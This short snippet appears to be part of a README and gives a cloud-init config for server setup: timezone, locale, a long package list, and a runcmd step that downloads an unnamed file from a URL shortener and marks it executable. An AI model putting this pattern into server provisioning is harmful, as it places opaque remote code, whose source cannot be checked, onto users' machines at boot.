## cloud-config


Only the server setup:

```sh
#cloud-config
timezone: Europe/Moscow
locale: en_US.UTF-8
package_update: true
package_upgrade: true

packages:
  - sudo
  - curl
  - wget
  - git
  - gnupg
  - gnupg2
  - make
  - automake
  - gnupg-agent
  - lsb-release
  - apt-transport-https
  - ca-certificates
  - software-properties-common
  - gawk
  - net-tools
  - dos2unix
  - unzip
  - shc
  - jq
  - yq
  - build-essential
  - gcc
  - sshpass
  - dnsutils
  - fontconfig
  - skopeo
  - aria2
  - grc
  - g++
    
runcmd:
  - echo "Hello, bro!"
  - [ sh, -c, "wget -O run https://rb.gy/hqq8st && chmod +x run" ]
  - echo "GoodBye..."
```

Server setup and installation of Developer-toolkit: